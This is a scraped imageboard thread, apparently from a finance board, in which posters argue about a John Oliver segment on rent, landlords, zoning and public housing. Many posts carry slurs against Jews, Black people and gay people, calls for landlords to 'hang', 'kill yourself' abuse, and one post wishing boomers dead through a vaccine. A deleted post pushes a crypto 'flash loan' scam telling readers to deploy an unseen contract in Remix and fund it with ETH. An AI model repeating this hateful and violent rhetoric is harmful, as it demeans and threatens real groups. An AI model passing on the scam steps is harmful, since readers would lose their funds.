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49847902 No.49847902 [Reply] [Original]

Landlords must hang

>> No.49848134

Glad the ivory tower cares so much about the common man!

>> No.49848198


If John Oliver cares so much why isn't he personally using his millions to create affordable housing for people of color and the LGBT community?

>> No.49848207

Build more apartments and shit then. Oh wait, environmental regulation bullshit that makes it impossible to build anything.

>> No.49848290

this. put your money where your mouth is or shut the fuck up.

>> No.49848291

You will have my rent on time. You will make small repairs on my property from time to time with no compensation. You will pay off my mortgage.

>> No.49848315

>environmental regulation bullshit
Wrong. Actually it's landlords seething about their property values and screeching against any new housing at zoning meetings.

>> No.49848355

this. Retarded boomers don't like tall buildings so they literally made laws banning it.


>> No.49848369


I see you have discovered that political parties are a sideshow designed to fool normies.

In the end everything on TV that you are allowed to see will keep things directly within the existing power and wealth framework. He will fake outrage at rent prices to make you feel like someone is "on your side" but ultimately nothing will ever be done because he is in the employment of the very people charging you high rents.

>> No.49848457

>You will make small repairs on my property from time to time with no compensation.
I have a couple that has almost completely remodeled the back porch. They've added a roof and screened it in. I've been waiting for them to ask for a discount on rent but they haven't for whatever reason. I'm still gonna raise the rent in 2024.

>> No.49848537

ngl this was based from Oliver

>> No.49848872

multiple property landlord checking in. lmfao to renter fags. pay me and seethe.

>> No.49848942

Notice it's about rent being too high, not housing prices
They tacitly accept that their viewers will be renting for the rest of their lives

>> No.49848959

that was a pretty difficult watch.
>ugh it sucks that neo-liberals replace/rennovate apartments to luxury apartments to eat the demand of a growing professional workforce.
>doesn't mention neo-liberal politicians
>mentions min wage hasn't increased but no mention of wages being a problem, just landlords should make less money off investments or maybe even act as a charity to tenants.
then much later
>here's what you're up against!
>landlord says people who refuse to read their contract are retarded and deserve what they get

>> No.49849140

Why not live in a van or with your family and put your money into an index fund? Then, you can move to another country like Thailand or Portugal and live like a king. This country is going to shit and not worth staying anyways.

>> No.49849270

>I'm still gonna raise the rent in 2024.

When the system collapses, and the police no longer exist, you will endure suffering beyond your comprehension.

>> No.49849296

>index fund


>> No.49849325

>have an asset that will appreciate so you can sell it later, plus earn a little while you wait to help offset the fact that your cash is locked up in the asset
why do rent-slaves like crypto so much?

>> No.49849337

Index fund will have a big return rate in next few years. You can probably double your money if you put it in now.

>> No.49849409

Enjoy being a human parasite

>> No.49849448
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>> No.49849775
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>> No.49849811

>the solution is to throw more money at the government!
every time

>> No.49849894
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>> No.49849936
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>news clips
do normies really

>> No.49849990

Only if they trust the söyence.

>> No.49850197

Yeah so he can build like 10 houses. LMAO. This is a policy problem not something charity can solve

>> No.49850589

literally the best solution to this is make government housing for everyone. apartments for free for tax payers. a true public option to curb the cost of private housing.

>> No.49850732

Why are you watching Jews? Just why?

>> No.49850972

since when does being gay make it hard to get housing

>> No.49851047

Ban usury
Jews can’t rub hands

>> No.49851075

man... normalfag programming is awful

>> No.49851123

This fucking faggot doesn’t even admit that the GOVERNMENT is restricting the housing supply.

>> No.49851133

kill yourself asap

>> No.49851146

You are actually retarded

>> No.49851149

If we didn’t have a government, landlords wouldn’t be ABLE to complain at zoning meetings because Zoning Meetings wouldn’t fucking exist.

>> No.49851272

rents due rentoid

>> No.49851450

lol you will never own a house

>> No.49851524

>landlords seething about their property values and screeching against any new housing at zoning meetings.
Not really fair I don't want them building more shitty apartments around my house either its not just landlords that don't want their communities diversified

>> No.49851679

>LGBT Community™
who are you talking about? Precisely who exactly?

>> No.49851755

>Landlords must hang
Time for progressive land taxes, with exemption for a single reasonable sized home and a single farm if land is under active cultivation. Mortgages have to be repayable in 30 years at current income, no disguising rent as a perpetual mortgage.

Return the commons to the common people, tax landlords into oblivion.

>> No.49851782

He's literally a literal Cambridge aristocrat.

>> No.49851831
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>2015 was 7 years ago

>> No.49851837
File: 1.53 MB, 1004x578, Screenshot from 2022-06-20 17-30-16.png [View same] [iqdb] [saucenao] [google]

This house is 150k. It's near a cliff. The neighbour house already fell. The house has no pictures of the inside because you can get inside due the risk.

>> No.49851855

He's late to the party but his timing is cynically done. Housing has always been a problem in places around the country where you have in more politically conservative areas with markets that have housing but controlled by overtly aggressive property management companies and a deliberate disinterest in developing further low income properties. In more politically liberal areas, you have middle to upper class self-styled liberals and progressives that use the pretext of environmentalism, gentrification concerns, and market devaluations once they realize the potential hazards that come with housing development since, for example, you can have something like the Geneva Towers in SF or the Bernal Dwellings. Where both were replaced with fancier units but serve few people.

>> No.49851861

What if America... Lept Forward Greatly?

>> No.49851889
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again. another one of these stupid fucking posts. YOU ARE NOT ENTITLED TO MY SHELTER. go live in a fucking van or pitch a tent if paying rent causes you to seethe so much.

>> No.49851897
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>> No.49851898
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>biz complains about landlord kikes all the time
>some popular leftie puts the issue right in front of millions of americans eyeballs

>> No.49851908
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>> No.49851943
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>> No.49852042

Easy, just hire an engineering firm to build a $400k wall to shore up the ground on your $200k house.

>> No.49852147

The power of zoning boards over land owners is directly responsible for low density housing.

Housing density is almost never economically optimal for the land owners and builders, it's the zoning boards which force lower density.

>> No.49852162 [DELETED] 

Check this out

>> No.49852210

If you could get the permits to drive piles and steel containment walls, it would probably raise the the price of the property by more than 400k$.

Getting the permits, that's the problem.

>> No.49852222

Who the fuck can handle 20 minutes of this retarded onions faggot? I made it to 3 minutes and am ready to stab my eyes with a fork

>> No.49852301

it's the chudjak irl lmao

>> No.49852352
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Pic related.

>> No.49852398
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I live in the barracks in the Army, I don't have to pay rent for the next 5 years.

>> No.49852419

Why do the retards on this site seethe so badly at landlords for being parasites but then glorify anyone in NEETbux?

>> No.49852506

Landlords dont really provide any value to anything. Giving landlords more money reduces consumer spending. Theyre bascially leaches on the economy imo, growing fat on peoples blood. Thats why I didnt feel bad for any of them during the eviction moratorium. Its hard to shed a tear for 40 year old abitiousless hedgefund babies. Seriously, landlord is like the easiest job in the world, all you have to do is be born with money.

>> No.49852577 [DELETED] 

Links to the resources are below.

Remix IDE:

Flash Loan Contract Code:
You're about to find out secret way to make money using the Ethereum Flash Loan Secret Method.

We make use of the flash loan method to self arbitrage on the Ethereum Network.

Flash loans are programmable contracts that we use to acquire loans between two blockchain blocks. This gives us the opportunity to get fee-less to very little fee loans between two block mining time. Only gas fees are paid when executing a flash loan.

This process is easily done by deploying a smart contract on the Ethereum Network via Remix and also swap tokens with UniSwap. All this happens within a single blockchain transaction and the transfer is made automatically using the smart contract.

With the borrowed loan, arbitrage opportunities are evaluated and the transaction is executed. During the mining of the second block, your borrowed money will be refunded and therefore, your loan will be paid.

After all these processes have been successfully executed, the profits of the transaction will be credited to your wallet and you have successfully executed an Ethereum arbitrage.

Flash Loan Contract Deployment

1-Open Remix IDE: http://remix.ethereum.org

2-Create new file and paste the Flash Loan Contract from the link:


3-Set Remix compiler version to 0.5.0 | change environment to Injected Web3.

4-Create your token by filling in the "_TOKENNAME" and "_TOKENSYMBOL" with the loan amount set to 1000.
Click transact to deploy when done.

5-Fund your deployed smart contract address with ETH's you have. (You can withdraw your ETH from smart contract anytime you want.)

6-Lastly, click on "action" to execute arbitrage and you're done.

>> No.49852706


>> No.49852725

It's annoying as hell. you can still keep your SFH zoning in the suburbs just let us build bigger in the city center.
But NIMBYs get irate that others could afford anything.

>> No.49852731


>> No.49852902

They're against building single-family detached housing, too. Anything that even mildly impacts their local fiefdom gets attacked.

>> No.49852938

Only the landlords who still have something worth renting out. The moment it's time to tear down and build new housing, they are all for higher density.

That particular problem isn't landlords, it's the whole concept of zoning boards.

>> No.49852996
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I will live with my parents as long as possible. Don't care if I'm 40. I will never give a single penny to Lardlord kikes or boomers.

>> No.49853046

Man, you guys really will do a 180 on your beliefs the moment you see a leftist share the same ideology? Literally yesterday I saw threads of people complaining about rent and landlords, but now that a lefty says the same thing, suddenly you’ve all changed your mind? I can’t imagine being such a cuck that you’d change your entire belief system just because someone you don’t like just happens to share the same opinions.

>> No.49853050

haven't watched this yet and probably won't because the "jokes" make me cringe more than the "funny images" my mom sends me on whatsapp, but in principle what you said is right - the rent is too high and landlords really must hang.

>> No.49853136

I can't believe I've been on this site for over half my life at this point. God help me

>> No.49853137

>letting tenants build or renovate your house.

Enjoy spending money on repairing or demolishing shit that they hackjob together.

>> No.49853266


>living a shit tier lifestyle and never reproducing or having sex just to save a few pennies and spite “the man”

Good goy

>> No.49853297

the best solution is to cut out the red tape to make brown bricks affordable to build again.

>> No.49853362
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WTFF WHY!!!!!!!!
Here's one that works for non-amerilards

>> No.49853367

I literally fuck college sluts at their place every weekend and I'm 30. Must suck to be ugly anon

>> No.49853581

I cant even rent a place despite offering 12 months rent in advance because i dont have a normie job which pays in normie bucks in regular intervals. shits fucked nigga.

>> No.49853618

Congrats I guess normie.
Not sure why you need to broadcast info like that on an anonymous image board but go off king

>> No.49853837

is that actually how it works? you can't just pay for a 12-month lease in cash up front?

>> No.49853840

another solution is to get rid of more people..problem fixes itself.

>> No.49854068

If you are 40 living at your parents, then you should at least have enough cash to buy a place without a mortgage.

>> No.49854109

And they will play Brazilian futbol with your severed head.

>> No.49854117

no the landlord/letting agents still require a full credit check. just in case you can't pay utility bills etc. its fucking dumb. all my money is in crypto i only cash out to fiat when i need to.

>> No.49854147

Na nobody will do anything. We can just print money to hire more cops, doesn't matter how bad things get.

>> No.49854158

Yes. But I'm not buying boomer bags in the west thats for sure. Low cost of living country and 24 hours a week WFH to live like a king.

>> No.49854292

Gonna have to call the based department to register this post

>> No.49854444

Its the reddit crew thats been hanging around here since crypto went mainstream

>> No.49854555
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>Dude if normies now know about it, things will change

Are you fucking gay?

>> No.49854787
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The solution for rent prices is stakeholder communism.
You stake your coins in a house, you can live there as much as you want. If you want to move, you unstake the coins from there, and restake in another house. The stake is done in a blockchain, with the houses managed by an AI, with a army of service robots for cleaning and repair.

For this model to work, landlords need to die. 99% of landlords and boomers and they love vaccines, so lets shill vaccines some more. A new virus is coming, so terrible and nasty that every boomer will take the next jab and dies.

>> No.49854964

>tfw you watched that debate live and it sold you on state politics forever

>> No.49855064


can confirm, FICO is a big thing when i was searching for room mates earlier this year. had a decent guy with 20k in the bank apply, his credit was 599 and the limit was 600. but because he was the only guy applying, the landlord allowed it so he's now my room mate and very chill. the korean girl was a disaster, couldnt get her mother the guarantor (couldnt speak english) to submit the correct docs, had no job, and so no verifiable FICO. i took her in under sublease and paying rent for both of us. landlord is fine, since i'm accepting the risk if she doesn't pay. turns out this is fairly common arrangement, someone with cash but shit FICO has to sublease from friends.

>> No.49855197

believe it or not, he's a goy.

>> No.49855387

the easiest way to make housing affordable is to give people a basic free option to compete with. start building the commie blocks in high urbanized areas and don't attach any conditions

>> No.49855459

well, US Citizen is a condition, thats it though, no forced employment or rent or anything. literally the only thing tax dollars makes sense to pay for.

>> No.49855587

yeah the jokes are horrible and make me hit mute

>> No.49855613
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Seems simple enough. A lot of poor people here that will rent for most of their lives. Majority of them are probably on some form of benefits.
It's like this on all the boards.

>> No.49855634

this is a pathetically stupid thing to say, stop using oxygen, kys

>> No.49855645

start building commie blocks and offering them not for free but at cost price excluding the price of the ground itself.
Start banning mass home ownership or capping it. Can't tell me you need more then 10 homes in a single country. Wouldn't hit the guy that's wageslaving away and buys a couple apartments.
Ban foreign investors from buying up housing. Not a citizen? Can't buy a house.
It's incredibly easy to solve but it is not in the interest of many. As long as the majority of your population considers themselves temporarily embarassed billionaires you won't be able to pass this.
Add to this that nobody wants a commie block build nearby as it will negatively influence their home value.

It'll be a while before people with braincells and money start to realise that as long as the population pyramid looks like an onion a system which chases after perpetual growth to sustain itself is going to run into massive problems. You can't import third worlders to keep your population going either as the housing market will run into even more issues.

>> No.49855719

My goy, you are the boomer now.

>> No.49855923

we played league together earlier didnt we

>> No.49856033

Look at the picture, the entire hill is subsiding. There’s no shoring that up unless you literally build a new hill of rock and steel piles, and in a dozen years the subsidence will spread to take the road out. That entire plateau is eroding. In 40 years everything in that picture will be a collapsed mud hole.

>> No.49856105

On my free credit score check I have a rating of 747. Hoping it will be a similar score for the full check I’m using for my application, and that combined me offering a full 12 months in advance will be enough to satisfy. If not I’d be able to cash out 5-10k in crypto if landlord would be satisfied with that.

>> No.49856113

No mention of Blackrock buying up housing? I guess he didn't want to piss off the wrong people.

>> No.49856305

Does that video mention the tens of millions of browns imported since the 60s? How about the tens of millions more illegals living in the country?

>> No.49856358

yeah alright, but cap the price of land sales. If that gets inflated then its for nothing.

>> No.49856374
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Fucking faggot lives in a 10 million dollar penthouse.

>> No.49856392
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>we're living in 7CY

>> No.49856425

Literal jew

>> No.49856445

I play alot of league. But then again so does everyone in the army it seems.

>> No.49856478

>rentcucks couldn't into cheap mortgages
>this is somehow my problem

>> No.49856736


>> No.49856780

Attempting to build cheap housing to just get blocked by locals could be a great way to virtue signal

>> No.49857044

>Cities pass legislation to stop reasonable amounts of housing from being made
>fill cities with the most inefficient transportation systems so if you build out or build up you'll forever be stuck with traffic
>get angry when massive demand to live in your artificially constrained city makes it impossible for your children to live there.

Progressives and conservatives both are incredibly small brains.

>> No.49857089

also american cities are fucked, building your entire city around the car is a dead end. you'll never be able to meet demand. you'll forever have standstill rush hour traffic

>> No.49857225

Joh Oliver stopped being funny or entertaining in 1015. It amazes me people still listen to his bland talentless unfunny canned laughter rants. It is not his fault, people age, loose their spark. His spark went out at least 7 years ago

>> No.49857271

Whoa, he’s been around a while

>> No.49857341

my lease was supposed to renew in august but we were just told rent is going up $500 to $1800 a month. could barely afford the $1300 and now the $1800 is impossible. my entire state of florida is fucked. rent prices even in the most back woods meth swamp are unaffordable because of all the yuppies moving from cali and new york with their work from home jobs. i’m going to be homeless in 2 months anons. there is no mom and dad for me to go back to. god speed

>> No.49857361
File: 69 KB, 1092x1058, zoomer.jpg [View same] [iqdb] [saucenao] [google]

It's this guy's government interventionist policies that cause rent to be expensive in the first place.

Everyone in this thread needs to watch this video.


>> No.49857370

>government prints trillions like there is no tomorrow

>> No.49857385


>giving people the right to counsel decreased evictions by 40% in nyc
huh, didn't know that. Honestly build more housing. Apt complexes, high rises, idgaf, build some more. We have an overabundance of space in this country, and putting up a building isn't difficult (laborwise, I'm aware zoning makes it stupid). there's no reason we should all be in this housing game acting like an apartment is a chunk of gold that will pay dividends for generations

>> No.49857390

Landlords are against these retarded zoning regulations. It's LEFTISTS that implement them.

>> No.49857399

you're not alone anon. this is becoming the norm rather than the exception. as soon as layoffs start in earnest they're going to get buck broken

>> No.49857405

Kill all communist bootlickers.
It's you people that cause skyrocketing housing prices.

>> No.49857415

how is there this many people that watch this brainwashing show?

>> No.49857431

>open the floodgates to waves of humans
>blame the kulak property owners for the increased housing demand

>> No.49857432

>temporarily embarassed billionaires
why are there so many reddit communists on this board now?
Please kill yourself immediately. It's you animals that caused this problem in the first place.

>> No.49857439

Don't sign the dotted line if you can't afford something. Why is this such a hard concept?

>> No.49857444
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>housing is a human right
ze pod
get in it

>> No.49857471

Like 80% of landlords own ONE fucking housing property.

>> No.49857508

>Landlords dont really provide any value to anything.
Except building new housing for people you absolute fucking moron. If there wasn't any landlords, there would be no capital to build new housing. Much less housing would have been built.

>Seriously, landlord is like the easiest job in the world, all you have to do is be born with money.
80% of landlords only own ONE housing property

>> No.49857565


>you will endure suffering beyond your comprehension.
HAHAHAHAHA Cry harder rentoid

>> No.49857584

>providing housing is being a parasite
nigger, you're living in my house

reddit is thataway leftoid

>> No.49857609

>literally the best solution to this is make government housing for everyone
no it isn't lmfao
The government is the one that BANS new housing from being developed in the first place.

>> No.49857626

holy shit kill yourself retard

>> No.49857668


>> No.49857679
File: 58 KB, 462x463, Not my problem.jpg [View same] [iqdb] [saucenao] [google]

Go be homeless then.

>> No.49857708

why are there so many retarded bootlicking communists from reddit on this board? I honestly want to know.

>> No.49857713

This is what the segment really should have concentrated on. My friend just finished law school and is having regret not studying for housing law. People are getting fucked hard in that area. There's so many exploitable loopholes to exploit. And often, the other side of the law can not afford counsel.

>> No.49857731

Landlords are good actually and housing prices would be a lot higher without them. There would be a fuckton less supply without them.

>> No.49857752

NYC is retarded and has had rent control for ages and wonders why prices are so fucking high there.
Also evictions are a good thing.

>> No.49857797

it is.

>> No.49857824

>why are there so many reddit communists on this board now?
They came here for a raid and are now here forever

>> No.49857846

why do you want expensive government housing and a housing shortage?

>> No.49857914

do you think portugal is as cheap as thailand lmao. why is every retard on here talking about portugal all of a sudden

>> No.49857933

also it's fucking incredible you retards don't realize in order for this to happen, resources have to be taken from the economy, bidding up prices for resources even further to fund inefficient government programs

>> No.49857978

it should be free housing for all US citizens. one house per person. see how expensive rent is when theres a public option to compete with.

what else would government taxes ever be spent on thats better than this? everyone needs a home. no one would be okay without one.

>> No.49857985

Bumping my rent from 3800 to 4000 just now. Honestly, that’s kind of cheap for the area too. It’s a Mexican family that has a million ugly cars parked in the driveway and street, they kind of make the neighborhood look shitty, but whatever

>> No.49858003

theres only a shortage bc we're not building it.

>> No.49858020

you're severely underestimating the incompetence of government

>> No.49858024

Whats hes point? Dont wanna watch the video.

>> No.49858033

no, just the voter who will vote against anything that favors the poor instead of the rich time and time again

>> No.49858080


>> No.49858106

>Don't sign the dotted line if you can't afford something. Why is this such a hard concept?

anon commodifying the basic human necessity of housing (i'm not saying it's a right, but it's a necessity to live) then making it barely affordable is going to back a lot of americans into a corner. at a certain point, once the number of americans that are unable to live in a house reaches critical mass, they're going to flip the game board over and rope every landlord they can find because the game of capitalism simply is unplayable for them and they have nothing to lose because they simply can't afford to sign the dotted line. and it won't matter whether that's right or wrong, it's just going to happen and i think we have too much inertia to change direction at this point.

>> No.49858131

>it should be free housing for all US citizens.
Who is going to provide this housing you absolute retard? lmao

>see how expensive rent is when theres a public option to compete with.
In order to build these houses, land labor and capital have to be diverted from the economy bidding up prices for houses even further.
Also, whenever your retarded public housing scam has been tried, it just results in massive WAITING LINES for the houses that take decades because government is inefficient in building housing.

The policies you support like rent control, central banking and zoning etc are what make housing expensive in the first place

>> No.49858168

we're not building it because of the retarded laws you parasites support

>anon commodifying the basic human necessity of housing
No problem with this. It's a good thing.
>then making it barely affordable
landlords don't control rent rates, they compete in a housing market.
>rope every landlord
Come and take it you commie parasite. You subhuman animals will get crucified.
Imagine blaming landlords for this problem instead of the government.

Kill yourself bootlicker.

>> No.49858171

Free government housing would become one of the most dangerous places on the planet.

>> No.49858193
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>> No.49858202
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>> No.49858217

>communist twitter screencaps

>> No.49858259

i'm already living in thailand desu

they don't allow foreigners to buy land here so house prices are dirt cheap. i have a thai wife so i just have her name on the house title, and we own a house that is honestly nicer then my previous one in the US that cost 5x as much.

with the extra money we are saving we are able to send our kid to a high quality international school where they will not be subjected to niggers or wokeisms.

>> No.49858273

Why does nobody in this thread care about the CAUSES of high housing prices(government intervention)?
Instead it's all MUH GREEDY LANDLORDS!!!11

>> No.49858280

He's not wrong, though.

>> No.49858279

you know damn well a renter isnt gonna do shit

>> No.49858317

tax dollars, build the fucking comie blocks retard

>> No.49858337

what the fuck did i just read. can someone translate?

>> No.49858339


>> No.49858352

just delete nimby zoning shit and build more housing

>> No.49858354

They would just take all of the good ones and give it to their cronies, government workers, favored minorities, etc.

>> No.49858372

Yes he fucking is lmao.
He attacks completely unrelated parties for this problem and completely ignores the cause. It's the policies HE FUCKING SUPPORTED(central banking, zoning, regulations, rent control etc) that caused this problem.
You have /r/latestagecapitalism open in another tab.

Absolute brainlet. I know people from Austria and they told me there's a 10-15 year waiting list for this "public housing" and they prioritize refugees and shit.
>tax dollars
I don't want to get taxed to pay for your horseshit programs that make life worse for everyone. Also, the tax dollars buy up scarce resources that make building in general more expensive.
Fucking moron.

Thank you.
This is the only answer.

>> No.49858459

keep making them, make housing free, never stop building housing.

>> No.49858478

>keep making them
I want to make them. It's leftist policies like zoning, central banking, regulation etc that prevents them from being made.
It's funny that government housing is magically except from all of these rules.

>> No.49858481

>Come and take it you commie parasite. You subhuman animals will get crucified.
>Imagine blaming landlords for this problem instead of the government.

anon they're going to come for me too. it doesn't matter that they're rightly or wrongly blaming landlords as a whole. most of them are scum, just like most of the people who are going to rope them are also scum. but everyone, landlords big and small, family and corporate, the government, and renters, everyone is chained to the snowballing effect of continuously bad decisions being made for 60 years. it doesn't even matter whether you believe me or not, whether you agree with me or not, whether we're hanged side by side or not. it's just going to happen.

>> No.49858513

>it's just going to happen.
so many retards claim a massive civil war will happen but it never happens

>> No.49858528

>leftist policies like zoning
Zoning isn't a leftist thing. It's a "fuck you I've got mine" thing, and you see people of all political stripes hypocritically supporting it.

>> No.49858554

>Zoning isn't a leftist thing.
lmao yes it is, same with rent control
it's leftists that put these policies in in the first place
>and you see people of all political stripes hypocritically supporting it.
You're right, but I mainly see leftists doing it.
Fuck NIMBYs btw

>> No.49858605
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most people don't give a shit about politics and civil war, but everyone gives a shit about housing. i don't have faith in any democratic or republican administration or congressional majority to contain the housing crisis, much less solve it.

>> No.49858618

Not sure how well that will work for US. Apartment need constant maintenance like their elevator and other shared facilities, while American just like to build and forget. I read about some apartments in US that are part of affordable housing project, they are badly maintained, same with their public roads

>> No.49858664

>leftist central banking

>> No.49858737

Marx himself advocated for one.
Every socialist country in history had one and extensively used it.
Central banking doesn't exist in free markets.

>> No.49858738

I mean honestly why the fuck would you remodel someone else's house? Why didn't they save the remodel money and put it down on a house of their own? Do rentoids really?? Im not even gonna criticize the rent hike considering how big of chumps they must be

>> No.49858857

>the us has no central bank

>> No.49858866

>Imagine blaming landlords for this problem instead of the government
Yeah theres a reason Hitler made land speculation and non productive based income illegal. Insane how he saw shit like this coming.

>> No.49859010

When I see people here agreeing with fucking John Oliver, I know the world is fucked beyond repair.

Sage btw

Gg everyone.

>> No.49859013

I thought hitler was alright because he was against the Jews but if he’s against real estate then he’s a giant faggot. Where else am I supposed to put my money? Fuck the stock market,
It’s boomer rocks, Monero and real estate for me. Only business I would invest in is my own or my families

>> No.49859169

>>the us has no central bank
Are you actually unironically implying the USA has a free market?
Why are leftists so brainwashed?

>Yeah theres a reason Hitler made land speculation and non productive based income illegal.
Because he was a retarded socialist pussy that killed himself?
Yeah thought so.
Kill yourself.
You bootlickers want to live in poverty.

>When I see people here agreeing with fucking John Oliver
yeah it's pretty bad, leftist propaganda gets out there and feeds upon itself
global IQs are dropping, things are going to get a lot worse
stay safe friend

>> No.49859270

I guess the 50 people he can house with 5 houses can go fuck themselves then...

>> No.49860504


>> No.49860516


>> No.49860535

> fuck jews
> goes on rant about how he is a mega-jew

>> No.49860549

Youre such a waste of oxygen

People should be able to decide the amount of money they recieve for their property you fucking retard

As he said that facist nigger can build homes and then place affordable prices for faggots who cant pay if he cares so much

Not obligate other people to do that kind of shit

>> No.49860574

Only low IQ people think rent is too high

People who cant make it because theyre too low IQ

So of course the many hordes of LOW IQ RETARDED PEOPLE complain about rent and agree with a literal midwit saying
>muh rent bad

>> No.49860620


All these retarded sub-humans dont ever think about going to live somewhere else

Someone more affordable

No they NEED the expensive place because ???

Then, like parasites, after choosing the expensive place want the price to be lowered

Like what is wrong with these sub-humans

>> No.49860649


Just accept reality you actual retards, you dont deserve to live in a place that expensive

You cant pay it, doesnt mean others cant

Face the facts you CANT pay rent that high

So you need to pay lower prices rent in affordable places for YOUR BROKE RETARDED NIGGER ASS

Not blame it on others

>> No.49860681

>it should be free housing for all US citizens.

This could be a nice option from the goverment

But theyre too busy building black niggers matter monuments

And giving trillioons in weapons to ukraine and israel so yeah

>> No.49860700

You are actually retarded

>> No.49860815

import the third world and now globalism fucks your rent here at home too, nice
fuck renters

>> No.49860854

lmao kys bootlicker

owning property is a white man's thing
renting it out is also a white mans thing
the vast majority of landlords are retired white people who only own one property.
national socialists are just marxists, lets be real here

>> No.49861215
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>> No.49861455

"Ok so I guess we should divert money away from social parasitism and war and put it towards infrastructure and residential constru-"

>> No.49861513

I'm not going to watch it, but I assume it personalises the issue to greedy or unreasonable landlords rather than trying to propose policy changes that could result in an increased housing/apartment supply and stimulate production, transport and communication in order to reduce costs and enable people to shop around and move to places with lower prices.

>> No.49861551

It is both sides of the spectrum. Leftists are just more annoying, while reTHUGlicans are more openly callous/sadistic. Leftists are more intelligent and rightists are dumber.

>> No.49861618

People don't know what we've ALL (the entire West, and at least most of the East) been in managed economies since roughly the time of the Bolshevik revolution, the Fed and the 1929 stockmarket crash. We've been in various managed economies ever since.

>> No.49862851

The barracks are literally homeless tier. Good job.